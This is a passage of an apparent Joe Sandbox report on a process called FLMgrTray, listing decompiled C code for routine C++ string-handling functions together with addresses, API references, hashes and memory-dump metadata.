                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$Xlength_error@std@@_invalid_parameter_noinfo_noreturnmemmove
                                                                                        • String ID:
                                                                                        • API String ID: 1596515511-0
                                                                                        • Opcode ID: 0ef2d5dc5d86fd169026aaa71fec8aea5abc7e11ec296546283a69efeb8ec1af
                                                                                        • Instruction ID: 5642a704cb9b6a36d79fdef22739d3b6960f316213d2f2c6e9a93790270fc50d
                                                                                        • Opcode Fuzzy Hash: 0ef2d5dc5d86fd169026aaa71fec8aea5abc7e11ec296546283a69efeb8ec1af
                                                                                        • Instruction Fuzzy Hash: 2D416671A00118AFCB14EF6CD88189DB7F5FF89310B60866EE929C7351EB319B25CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 73%
                                                                                        			E001661B0(void* __ecx, char _a3, void* _a4, void* _a8) {
                                                                                        				char _v0;
                                                                                        				unsigned int _v8;
                                                                                        				void* _v12;
                                                                                        				void _v16;
                                                                                        				int _v20;
                                                                                        				intOrPtr* _v24;
                                                                                        				intOrPtr _v36;
                                                                                        				intOrPtr* _v40;
                                                                                        				intOrPtr* _t70;
                                                                                        				void* _t71;
                                                                                        				void* _t82;
                                                                                        				void* _t90;
                                                                                        				void* _t103;
                                                                                        				int _t106;
                                                                                        				intOrPtr* _t107;
                                                                                        				intOrPtr* _t108;
                                                                                        				intOrPtr* _t111;
                                                                                        				intOrPtr _t112;
                                                                                        				signed int _t114;
                                                                                        				void* _t115;
                                                                                        				void* _t119;
                                                                                        				void* _t122;
                                                                                        				unsigned int _t123;
                                                                                        				intOrPtr _t124;
                                                                                        				intOrPtr* _t125;
                                                                                        				void* _t126;
                                                                                        				void* _t127;
                                                                                        				intOrPtr* _t128;
                                                                                        				int _t129;
                                                                                        				intOrPtr* _t130;
                                                                                        				void* _t131;
                                                                                        				void* _t132;
                                                                                        				void* _t135;
                                                                                        				void* _t136;
                                                                                        
                                                                                        				_t108 = __ecx;
                                                                                        				_t106 = _a8;
                                                                                        				_t127 = __ecx;
                                                                                        				_t123 =  *(__ecx + 0x14);
                                                                                        				_t129 =  *(__ecx + 0x10);
                                                                                        				_v20 = _t129;
                                                                                        				_v8 = _t123;
                                                                                        				if(_t106 > _t123 - _t129) {
                                                                                        					if(0x7fffffff - _t129 < _t106) {
                                                                                        						E001631F0(_t123);
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						_t136 = _t135 - 8;
                                                                                        						_t70 = _t108;
                                                                                        						_push(_t106);
                                                                                        						_t107 = _v24;
                                                                                        						_push(_t129);
                                                                                        						_v40 = _t70;
                                                                                        						_t71 =  *_t70;
                                                                                        						_t130 = _t71;
                                                                                        						_push(_t127);
                                                                                        						_v36 = _t71;
                                                                                        						_t128 =  *((intOrPtr*)(_t130 + 4));
                                                                                        						if( *((char*)(_t128 + 0xd)) == 0) {
                                                                                        							do {
                                                                                        								_t125 = _t107;
                                                                                        								if( *((intOrPtr*)(_t107 + 0x14)) >= 0x10) {
                                                                                        									_t125 =  *_t107;
                                                                                        								}
                                                                                        								_t112 = _t128 + 0x10;
                                                                                        								if( *((intOrPtr*)(_t128 + 0x24)) >= 0x10) {
                                                                                        									_t112 =  *((intOrPtr*)(_t128 + 0x10));
                                                                                        								}
                                                                                        								_t82 = E001652F0(_t112,  *((intOrPtr*)(_t128 + 0x20)), _t125,  *((intOrPtr*)(_t107 + 0x10)));
                                                                                        								_t136 = _t136 + 0x10;
                                                                                        								if(_t82 >= 0) {
                                                                                        									_t130 = _t128;
                                                                                        									_t128 =  *_t128;
                                                                                        								} else {
                                                                                        									_t128 =  *((intOrPtr*)(_t128 + 8));
                                                                                        								}
                                                                                        							} while ( *((char*)(_t128 + 0xd)) == 0);
                                                                                        							_t71 = _v12;
                                                                                        						}
                                                                                        						if(_t130 == _t71) {
                                                                                        							L35:
                                                                                        							_push( &_a3);
                                                                                        							_v12 = _t107;
                                                                                        							E00164F00(_v16,  &_v0, _t130, E00164D10(_v16, 0x190110,  &_v12) + 0x10, _t74);
                                                                                        							return _v0 + 0x28;
                                                                                        						} else {
                                                                                        							_t124 = _t130 + 0x10;
                                                                                        							if( *((intOrPtr*)(_t130 + 0x24)) >= 0x10) {
                                                                                        								_t124 =  *((intOrPtr*)(_t130 + 0x10));
                                                                                        							}
                                                                                        							_t111 = _t107;
                                                                                        							if( *((intOrPtr*)(_t107 + 0x14)) >= 0x10) {
                                                                                        								_t111 =  *_t107;
                                                                                        							}
                                                                                        							if(E001652F0(_t111,  *((intOrPtr*)(_t107 + 0x10)), _t124,  *((intOrPtr*)(_t130 + 0x20))) < 0) {
                                                                                        								goto L35;
                                                                                        							} else {
                                                                                        								return _t130 + 0x28;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t114 = _t129 + _t106 | 0x0000000f;
                                                                                        						if(_t114 <= 0x7fffffff) {
                                                                                        							_a8 = _t123 >> 1;
                                                                                        							if(_t123 <= 0x7fffffff - _a8) {
                                                                                        								_t115 =  <  ? _a8 + _t123 : _t114;
                                                                                        							} else {
                                                                                        								_t115 = 0x7fffffff;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t115 = 0x7fffffff;
                                                                                        						}
                                                                                        						_t14 = _t115 + 1; // 0x80000000
                                                                                        						_a8 = _t115;
                                                                                        						_t90 = E00163200(_t123, _t14);
                                                                                        						_v16 = _t90;
                                                                                        						 *((intOrPtr*)(_t127 + 0x10)) = _t129 + _t106;
                                                                                        						 *((intOrPtr*)(_t127 + 0x14)) = _a8;
                                                                                        						_t119 = _t90 + _t129;
                                                                                        						_a8 = _t119;
                                                                                        						_v12 = _t119 + _t106;
                                                                                        						if(_v8 < 0x10) {
                                                                                        							L16:
                                                                                        							memcpy(_t90, _t127, _t129);
                                                                                        							memcpy(_a8, _a4, _t106);
                                                                                        							 *_v12 = 0;
                                                                                        							 *_t127 = _v16;
                                                                                        							return _t127;
                                                                                        						} else {
                                                                                        							_t131 =  *_t127;
                                                                                        							memcpy(_t90, _t131, _v20);
                                                                                        							memcpy(_a8, _a4, _t106);
                                                                                        							_t98 = _v12;
                                                                                        							_t135 = _t135 + 0x18;
                                                                                        							_t122 = _v8 + 1;
                                                                                        							 *_v12 = 0;
                                                                                        							if(_t122 < 0x1000) {
                                                                                        								L14:
                                                                                        								_push(_t122);
                                                                                        								E00175733(_t98, _t131);
                                                                                        								 *_t127 = _v16;
                                                                                        								return _t127;
                                                                                        							} else {
                                                                                        								_t126 =  *(_t131 - 4);
                                                                                        								_t122 = _t122 + 0x23;
                                                                                        								_t129 = _t131 - _t126;
                                                                                        								_t90 = _t129 - 4;
                                                                                        								if(_t90 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									goto L16;
                                                                                        								} else {
                                                                                        									_t131 = _t126;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					 *(__ecx + 0x10) = _t129 + _t106;
                                                                                        					_t103 = __ecx;
                                                                                        					if(_t123 >= 0x10) {
                                                                                        						_t103 =  *((intOrPtr*)(__ecx));
                                                                                        					}
                                                                                        					_t132 = _t129 + _t103;
                                                                                        					memmove(_t132, _a4, _t106);
                                                                                        					 *((char*)(_t132 + _t106)) = 0;
                                                                                        					return _t127;
                                                                                        				}
                                                                                        			}





































                                                                                        0x001661b0
                                                                                        0x001661b7
                                                                                        0x001661bc
                                                                                        0x001661be
                                                                                        0x001661c3
                                                                                        0x001661c8
                                                                                        0x001661cb
                                                                                        0x001661d0
                                                                                        0x00166208
                                                                                        0x00166301
                                                                                        0x00166306
                                                                                        0x00166307
                                                                                        0x00166308
                                                                                        0x00166309
                                                                                        0x0016630a
                                                                                        0x0016630b
                                                                                        0x0016630c
                                                                                        0x0016630d
                                                                                        0x0016630e
                                                                                        0x0016630f
                                                                                        0x00166313
                                                                                        0x00166316
                                                                                        0x00166318
                                                                                        0x00166319
                                                                                        0x0016631c
                                                                                        0x0016631d
                                                                                        0x00166320
                                                                                        0x00166322
                                                                                        0x00166324
                                                                                        0x00166325
                                                                                        0x00166328
                                                                                        0x0016632f
                                                                                        0x00166331
                                                                                        0x00166335
                                                                                        0x00166337
                                                                                        0x00166339
                                                                                        0x00166339
                                                                                        0x0016633f
                                                                                        0x00166342
                                                                                        0x00166344
                                                                                        0x00166344
                                                                                        0x0016634f
                                                                                        0x00166354
                                                                                        0x00166359
                                                                                        0x00166360
                                                                                        0x00166362
                                                                                        0x0016635b
                                                                                        0x0016635b
                                                                                        0x0016635b
                                                                                        0x00166364
                                                                                        0x0016636a
                                                                                        0x0016636a
                                                                                        0x0016636f
                                                                                        0x001663a7
                                                                                        0x001663ad
                                                                                        0x001663b1
                                                                                        0x001663cc
                                                                                        0x001663dd
                                                                                        0x00166371
                                                                                        0x00166375
                                                                                        0x00166378
                                                                                        0x0016637a
                                                                                        0x0016637a
                                                                                        0x00166381
                                                                                        0x00166383
                                                                                        0x00166385
                                                                                        0x00166385
                                                                                        0x00166399
                                                                                        0x00000000
                                                                                        0x0016639c
                                                                                        0x001663a4
                                                                                        0x001663a4
                                                                                        0x00166399
                                                                                        0x0016620e
                                                                                        0x00166211
                                                                                        0x0016621a
                                                                                        0x00166227
                                                                                        0x00166234
                                                                                        0x00166244
                                                                                        0x00166236
                                                                                        0x00166236
                                                                                        0x00166236
                                                                                        0x0016621c
                                                                                        0x0016621c
                                                                                        0x0016621c
                                                                                        0x00166247
                                                                                        0x0016624a
                                                                                        0x00166250
                                                                                        0x00166258
                                                                                        0x0016625b
                                                                                        0x00166261
                                                                                        0x00166264
                                                                                        0x00166267
                                                                                        0x00166270
                                                                                        0x00166273
                                                                                        0x001662d4
                                                                                        0x001662d7
                                                                                        0x001662e3
                                                                                        0x001662ee
                                                                                        0x001662f4
                                                                                        0x001662fe
                                                                                        0x00166275
                                                                                        0x00166278
                                                                                        0x0016627c
                                                                                        0x00166288
                                                                                        0x0016628d
                                                                                        0x00166290
                                                                                        0x00166296
                                                                                        0x00166297
                                                                                        0x001662a0
                                                                                        0x001662b4
                                                                                        0x001662b4
                                                                                        0x001662b6
                                                                                        0x001662c1
                                                                                        0x001662cb
                                                                                        0x001662a2
                                                                                        0x001662a2
                                                                                        0x001662a5
                                                                                        0x001662a8
                                                                                        0x001662aa
                                                                                        0x001662b0
                                                                                        0x001662ce
                                                                                        0x00000000
                                                                                        0x001662b2
                                                                                        0x001662b2
                                                                                        0x00000000
                                                                                        0x001662b2
                                                                                        0x001662b0
                                                                                        0x001662a0
                                                                                        0x00166273
                                                                                        0x001661d2
                                                                                        0x001661d5
                                                                                        0x001661d8
                                                                                        0x001661dd
                                                                                        0x001661df
                                                                                        0x001661df
                                                                                        0x001661e5
                                                                                        0x001661e8
                                                                                        0x001661f0
                                                                                        0x001661fc
                                                                                        0x001661fc

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(?,2C80D730,?,2C80D731,?,?,00190114,?,2C80D730), ref: 001661E8
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00190114,?,2C80D731,?,?,00190114,?,2C80D730), ref: 0016627C
                                                                                        • memcpy.VCRUNTIME140(?,2C80D730,?,00000000,?,00190114,?,2C80D731,?,?,00190114,?,2C80D730), ref: 00166288
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,2C80D731,?,?,00190114,?,2C80D730), ref: 001662CE
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,2C80D731,?,?,00190114,?,2C80D730), ref: 001662D7
                                                                                        • memcpy.VCRUNTIME140(?,2C80D730,?,00000000,?,?,?,2C80D731,?,?,00190114,?,2C80D730), ref: 001662E3
                                                                                          • Part of subcall function 001631F0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000,?,?,00181718,?,2C80D730), ref: 001631F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$Xlength_error@std@@_invalid_parameter_noinfo_noreturnmemmove
                                                                                        • String ID:
                                                                                        • API String ID: 1596515511-0
                                                                                        • Opcode ID: eb2a9282b75d4cb3670b36eb3293dcfcfe53ab03deb5770da699e71b6b982988
                                                                                        • Instruction ID: bed6c66a4fa300a4844758c6b190fd0175a3714e6ac4701573de18ece3d408b9
                                                                                        • Opcode Fuzzy Hash: eb2a9282b75d4cb3670b36eb3293dcfcfe53ab03deb5770da699e71b6b982988
                                                                                        • Instruction Fuzzy Hash: 1541B531A00104AFCB19DF6CDC90AADBBB5FF95320B50826EF929D7341D7319A64CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 67%
                                                                                        			E00164220(void* __ebx, void* __ecx, void* __edi, void* _a4, int _a8, void* _a12) {
                                                                                        				void* _v0;
                                                                                        				unsigned int _v8;
                                                                                        				unsigned int _v12;
                                                                                        				int _v16;
                                                                                        				void* _v20;
                                                                                        				void* _v24;
                                                                                        				void* _t126;
                                                                                        				unsigned int _t127;
                                                                                        				signed int _t131;
                                                                                        				unsigned int _t132;
                                                                                        				void* _t137;
                                                                                        				void _t157;
                                                                                        				void* _t158;
                                                                                        				void* _t189;
                                                                                        				void _t202;
                                                                                        				int _t207;
                                                                                        				int _t208;
                                                                                        				void* _t218;
                                                                                        				intOrPtr* _t219;
                                                                                        				signed int _t221;
                                                                                        				void* _t222;
                                                                                        				void* _t225;
                                                                                        				void* _t228;
                                                                                        				void _t232;
                                                                                        				void _t233;
                                                                                        				signed int _t235;
                                                                                        				void* _t236;
                                                                                        				void* _t241;
                                                                                        				void* _t244;
                                                                                        				unsigned int _t245;
                                                                                        				void* _t246;
                                                                                        				void* _t250;
                                                                                        				void* _t254;
                                                                                        				int _t255;
                                                                                        				void* _t256;
                                                                                        				void* _t258;
                                                                                        				void* _t259;
                                                                                        				int _t269;
                                                                                        				intOrPtr* _t270;
                                                                                        				void* _t274;
                                                                                        				void* _t276;
                                                                                        				int _t277;
                                                                                        				void* _t279;
                                                                                        				void* _t283;
                                                                                        				void* _t285;
                                                                                        				void* _t288;
                                                                                        				void* _t298;
                                                                                        				void* _t299;
                                                                                        				void* _t300;
                                                                                        
                                                                                        				_t218 = __ecx;
                                                                                        				_t288 = _t298;
                                                                                        				_t299 = _t298 - 0x10;
                                                                                        				_t207 = _a4;
                                                                                        				_t258 = __ecx;
                                                                                        				_t245 =  *(__ecx + 0x14);
                                                                                        				_t269 =  *(__ecx + 0x10);
                                                                                        				_v20 = _t269;
                                                                                        				_v8 = _t245;
                                                                                        				if(_t207 > _t245 - _t269) {
                                                                                        					if(0x7fffffff - _t269 < _t207) {
                                                                                        						E001631F0(_t245);
                                                                                        						asm("int3");
                                                                                        						_push(_t288);
                                                                                        						_t246 = _v24;
                                                                                        						_t300 = _t299 - 0x10;
                                                                                        						_push(_t207);
                                                                                        						_push(_t269);
                                                                                        						_push(_t258);
                                                                                        						_t259 = _t218;
                                                                                        						_t219 =  *((intOrPtr*)(_t259 + 0x10));
                                                                                        						if(_t219 < _t246) {
                                                                                        							E00164210(_t207, _t219, _t259);
                                                                                        							goto L51;
                                                                                        						} else {
                                                                                        							_t208 = _a12;
                                                                                        							_t126 = _t219 - _t246;
                                                                                        							_v24 = _t126;
                                                                                        							_t269 =  <  ? _t126 : _a4;
                                                                                        							_t127 =  *((intOrPtr*)(_t259 + 0x14));
                                                                                        							_a4 = _t269;
                                                                                        							_v12 = _t127;
                                                                                        							if(_t269 != _t208) {
                                                                                        								_v16 = _v24 - _t269 + 1;
                                                                                        								_t250 = _v0;
                                                                                        								if(_t208 >= _t269) {
                                                                                        									_a12 = _t208;
                                                                                        									_a12 = _a12 - _t269;
                                                                                        									if(_a12 > _t127 - _t219) {
                                                                                        										_t246 = _a12;
                                                                                        										if(0x7fffffff - _t219 < _t246) {
                                                                                        											L51:
                                                                                        											E001631F0(_t246);
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											_push(_t269);
                                                                                        											_t270 = _t219;
                                                                                        											 *_t270 = malloc(0x408);
                                                                                        											return _t270;
                                                                                        										} else {
                                                                                        											_t131 = _t219 + _t246;
                                                                                        											_v20 = _t131;
                                                                                        											_t221 = _t131 | 0x0000000f;
                                                                                        											if(_t221 <= 0x7fffffff) {
                                                                                        												_t132 = _v12;
                                                                                        												_a12 = _t132 >> 1;
                                                                                        												_t246 = 0x7fffffff - _a12;
                                                                                        												if(_t132 <= 0x7fffffff) {
                                                                                        													_t222 =  <  ? _a12 + _t132 : _t221;
                                                                                        												} else {
                                                                                        													_t222 = 0x7fffffff;
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t222 = 0x7fffffff;
                                                                                        											}
                                                                                        											_t88 = _t222 + 1; // 0x80000000
                                                                                        											_a12 = _t222;
                                                                                        											_t254 = E00163200(_t246, _t88);
                                                                                        											 *((intOrPtr*)(_t259 + 0x10)) = _v20;
                                                                                        											_t137 = _v0;
                                                                                        											 *((intOrPtr*)(_t259 + 0x14)) = _a12;
                                                                                        											_v24 = _t254;
                                                                                        											_push(_t137);
                                                                                        											_t225 = _t254 + _t137;
                                                                                        											_a12 = _t225;
                                                                                        											_v20 = _t225 + _t208;
                                                                                        											if(_v12 < 0x10) {
                                                                                        												L49:
                                                                                        												memcpy(_t254, _t259, ??);
                                                                                        												memcpy(_a12, _a8, _t208);
                                                                                        												memcpy(_v20, _v0 + _t269 + _t259, _v16);
                                                                                        												 *_t259 = _v24;
                                                                                        												return _t259;
                                                                                        											} else {
                                                                                        												_t274 =  *_t259;
                                                                                        												memcpy(_t254, _t274, ??);
                                                                                        												memcpy(_a12, _a8, _t208);
                                                                                        												_t151 = memcpy(_v20, _v0 + _t274 + _a4, _v16);
                                                                                        												_t300 = _t300 + 0x24;
                                                                                        												_t228 = _v12 + 1;
                                                                                        												if(_t228 < 0x1000) {
                                                                                        													L47:
                                                                                        													_push(_t228);
                                                                                        													E00175733(_t151, _t274);
                                                                                        													 *_t259 = _v24;
                                                                                        													return _t259;
                                                                                        												} else {
                                                                                        													_t254 =  *(_t274 - 4);
                                                                                        													_t228 = _t228 + 0x23;
                                                                                        													_t269 = _t274 - _t254;
                                                                                        													_t151 = _t269 - 4;
                                                                                        													if(_t269 - 4 > 0x1f) {
                                                                                        														__imp___invalid_parameter_noinfo_noreturn();
                                                                                        														goto L49;
                                                                                        													} else {
                                                                                        														_t274 = _t254;
                                                                                        														goto L47;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									} else {
                                                                                        										_a4 = _t259;
                                                                                        										 *((intOrPtr*)(_t259 + 0x10)) = _a12 + _t219;
                                                                                        										_t157 = _t259;
                                                                                        										if(_v12 >= 0x10) {
                                                                                        											_t157 =  *_t259;
                                                                                        											_a4 = _t157;
                                                                                        										}
                                                                                        										_t158 = _t157 + _t250;
                                                                                        										_t255 = _a8;
                                                                                        										_t276 = _t269 + _t158;
                                                                                        										_v0 = _t158;
                                                                                        										_v24 = _t276;
                                                                                        										if(_t255 + _t208 <= _v0 || _t255 > _a4 + _t219) {
                                                                                        											_t277 = _t208;
                                                                                        										} else {
                                                                                        											if(_t276 > _t255) {
                                                                                        												_t277 = _t276 - _t255;
                                                                                        											} else {
                                                                                        												_t277 = 0;
                                                                                        											}
                                                                                        										}
                                                                                        										memmove(_a12 + _v24, _v24, _v16);
                                                                                        										memmove(_v0, _a8, _t277);
                                                                                        										memcpy(_v0 + _t277, _a12 + _t277 + _a8, _t208 - _t277);
                                                                                        										return _t259;
                                                                                        									}
                                                                                        								} else {
                                                                                        									 *((intOrPtr*)(_t259 + 0x10)) = _t219 - _t269 + _t208;
                                                                                        									_t232 = _t259;
                                                                                        									if(_t127 >= 0x10) {
                                                                                        										_t232 =  *_t259;
                                                                                        									}
                                                                                        									_t279 = _t232 + _t250;
                                                                                        									memmove(_t279, _a8, _t208);
                                                                                        									memmove(_t279 + _t208, _a4 + _t279, _v16);
                                                                                        									return _t259;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t233 = _t259;
                                                                                        								if(_t127 >= 0x10) {
                                                                                        									_t233 =  *_t259;
                                                                                        								}
                                                                                        								memmove(_t233 + _t246, _a8, _t208);
                                                                                        								return _t259;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t235 = _t269 + _t207 | 0x0000000f;
                                                                                        						if(_t235 <= 0x7fffffff) {
                                                                                        							_a4 = _t245 >> 1;
                                                                                        							if(_t245 <= 0x7fffffff - _a4) {
                                                                                        								_t236 =  <  ? _a4 + _t245 : _t235;
                                                                                        							} else {
                                                                                        								_t236 = 0x7fffffff;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t236 = 0x7fffffff;
                                                                                        						}
                                                                                        						_t14 = _t236 + 1; // 0x80000000
                                                                                        						_a4 = _t236;
                                                                                        						_t189 = E00163200(_t245, _t14);
                                                                                        						_v16 = _t189;
                                                                                        						 *((intOrPtr*)(_t258 + 0x10)) = _t269 + _t207;
                                                                                        						 *((intOrPtr*)(_t258 + 0x14)) = _a4;
                                                                                        						_t241 = _t189 + _t269;
                                                                                        						_a4 = _t241;
                                                                                        						_v12 = _t241 + _t207;
                                                                                        						if(_v8 < 0x10) {
                                                                                        							L16:
                                                                                        							memcpy(_t189, _t258, _t269);
                                                                                        							memset(_a4, _a8, _t207);
                                                                                        							 *_v12 = 0;
                                                                                        							 *_t258 = _v16;
                                                                                        							return _t258;
                                                                                        						} else {
                                                                                        							_t283 =  *_t258;
                                                                                        							memcpy(_t189, _t283, _v20);
                                                                                        							memset(_a4, _a8, _t207);
                                                                                        							_t197 = _v12;
                                                                                        							_t299 = _t299 + 0x18;
                                                                                        							_t244 = _v8 + 1;
                                                                                        							 *_v12 = 0;
                                                                                        							if(_t244 < 0x1000) {
                                                                                        								L14:
                                                                                        								_push(_t244);
                                                                                        								E00175733(_t197, _t283);
                                                                                        								 *_t258 = _v16;
                                                                                        								return _t258;
                                                                                        							} else {
                                                                                        								_t256 =  *(_t283 - 4);
                                                                                        								_t244 = _t244 + 0x23;
                                                                                        								_t269 = _t283 - _t256;
                                                                                        								_t189 = _t269 - 4;
                                                                                        								if(_t189 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									goto L16;
                                                                                        								} else {
                                                                                        									_t283 = _t256;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					 *(__ecx + 0x10) = _t269 + _t207;
                                                                                        					_t202 = __ecx;
                                                                                        					if(_t245 >= 0x10) {
                                                                                        						_t202 =  *__ecx;
                                                                                        					}
                                                                                        					_t285 = _t269 + _t202;
                                                                                        					memset(_t285, _a8, _t207);
                                                                                        					 *((char*)(_t285 + _t207)) = 0;
                                                                                        					return _t258;
                                                                                        				}
                                                                                        			}




















































                                                                                        0x00164220
                                                                                        0x00164221
                                                                                        0x00164223
                                                                                        0x00164227
                                                                                        0x0016422c
                                                                                        0x0016422e
                                                                                        0x00164233
                                                                                        0x00164238
                                                                                        0x0016423b
                                                                                        0x00164240
                                                                                        0x0016427a
                                                                                        0x0016437a
                                                                                        0x0016437f
                                                                                        0x00164380
                                                                                        0x00164383
                                                                                        0x00164386
                                                                                        0x00164389
                                                                                        0x0016438a
                                                                                        0x0016438b
                                                                                        0x0016438c
                                                                                        0x0016438e
                                                                                        0x00164393
                                                                                        0x001645e9
                                                                                        0x00000000
                                                                                        0x00164399
                                                                                        0x0016439e
                                                                                        0x001643a1
                                                                                        0x001643a5
                                                                                        0x001643a8
                                                                                        0x001643ab
                                                                                        0x001643ae
                                                                                        0x001643b1
                                                                                        0x001643b6
                                                                                        0x001643e2
                                                                                        0x001643e5
                                                                                        0x001643ea
                                                                                        0x00164429
                                                                                        0x0016442e
                                                                                        0x00164434
                                                                                        0x001644c1
                                                                                        0x001644cd
                                                                                        0x001645ee
                                                                                        0x001645ee
                                                                                        0x001645f3
                                                                                        0x001645f4
                                                                                        0x001645f5
                                                                                        0x001645f6
                                                                                        0x001645f7
                                                                                        0x001645f8
                                                                                        0x001645f9
                                                                                        0x001645fa
                                                                                        0x001645fb
                                                                                        0x001645fc
                                                                                        0x001645fd
                                                                                        0x001645fe
                                                                                        0x001645ff
                                                                                        0x00164600
                                                                                        0x00164606
                                                                                        0x00164611
                                                                                        0x00164616
                                                                                        0x001644d3
                                                                                        0x001644d3
                                                                                        0x001644d8
                                                                                        0x001644db
                                                                                        0x001644e4
                                                                                        0x001644ed
                                                                                        0x001644f4
                                                                                        0x001644fc
                                                                                        0x00164501
                                                                                        0x0016450f
                                                                                        0x00164503
                                                                                        0x00164503
                                                                                        0x00164503
                                                                                        0x001644e6
                                                                                        0x001644e6
                                                                                        0x001644e6
                                                                                        0x00164512
                                                                                        0x00164515
                                                                                        0x00164523
                                                                                        0x00164528
                                                                                        0x0016452b
                                                                                        0x0016452e
                                                                                        0x00164531
                                                                                        0x00164534
                                                                                        0x00164535
                                                                                        0x00164538
                                                                                        0x00164541
                                                                                        0x00164544
                                                                                        0x001645b0
                                                                                        0x001645b2
                                                                                        0x001645be
                                                                                        0x001645d1
                                                                                        0x001645dc
                                                                                        0x001645e6
                                                                                        0x00164546
                                                                                        0x00164546
                                                                                        0x0016454a
                                                                                        0x00164556
                                                                                        0x0016456a
                                                                                        0x00164572
                                                                                        0x00164575
                                                                                        0x0016457c
                                                                                        0x00164590
                                                                                        0x00164590
                                                                                        0x00164592
                                                                                        0x0016459d
                                                                                        0x001645a7
                                                                                        0x0016457e
                                                                                        0x0016457e
                                                                                        0x00164581
                                                                                        0x00164584
                                                                                        0x00164586
                                                                                        0x0016458c
                                                                                        0x001645aa
                                                                                        0x00000000
                                                                                        0x0016458e
                                                                                        0x0016458e
                                                                                        0x00000000
                                                                                        0x0016458e
                                                                                        0x0016458c
                                                                                        0x0016457c
                                                                                        0x00164544
                                                                                        0x0016443a
                                                                                        0x0016443f
                                                                                        0x00164446
                                                                                        0x00164449
                                                                                        0x0016444b
                                                                                        0x0016444d
                                                                                        0x0016444f
                                                                                        0x0016444f
                                                                                        0x00164452
                                                                                        0x00164454
                                                                                        0x00164457
                                                                                        0x00164459
                                                                                        0x0016445c
                                                                                        0x00164465
                                                                                        0x0016447c
                                                                                        0x00164470
                                                                                        0x00164472
                                                                                        0x00164478
                                                                                        0x00164474
                                                                                        0x00164474
                                                                                        0x00164474
                                                                                        0x00164472
                                                                                        0x0016448b
                                                                                        0x00164497
                                                                                        0x001644ae
                                                                                        0x001644be
                                                                                        0x001644be
                                                                                        0x001643ec
                                                                                        0x001643f0
                                                                                        0x001643f3
                                                                                        0x001643f8
                                                                                        0x001643fa
                                                                                        0x001643fa
                                                                                        0x00164400
                                                                                        0x00164404
                                                                                        0x00164416
                                                                                        0x00164426
                                                                                        0x00164426
                                                                                        0x001643b8
                                                                                        0x001643b8
                                                                                        0x001643bd
                                                                                        0x001643bf
                                                                                        0x001643bf
                                                                                        0x001643c9
                                                                                        0x001643d9
                                                                                        0x001643d9
                                                                                        0x001643b6
                                                                                        0x00164280
                                                                                        0x00164283
                                                                                        0x0016428c
                                                                                        0x00164299
                                                                                        0x001642a6
                                                                                        0x001642b6
                                                                                        0x001642a8
                                                                                        0x001642a8
                                                                                        0x001642a8
                                                                                        0x0016428e
                                                                                        0x0016428e
                                                                                        0x0016428e
                                                                                        0x001642b9
                                                                                        0x001642bc
                                                                                        0x001642c2
                                                                                        0x001642ca
                                                                                        0x001642cd
                                                                                        0x001642d3
                                                                                        0x001642dd
                                                                                        0x001642e0
                                                                                        0x001642e9
                                                                                        0x001642ec
                                                                                        0x0016434d
                                                                                        0x00164350
                                                                                        0x0016435c
                                                                                        0x00164367
                                                                                        0x0016436d
                                                                                        0x00164377
                                                                                        0x001642ee
                                                                                        0x001642f1
                                                                                        0x001642f5
                                                                                        0x00164301
                                                                                        0x00164306
                                                                                        0x00164309
                                                                                        0x0016430f
                                                                                        0x00164310
                                                                                        0x00164319
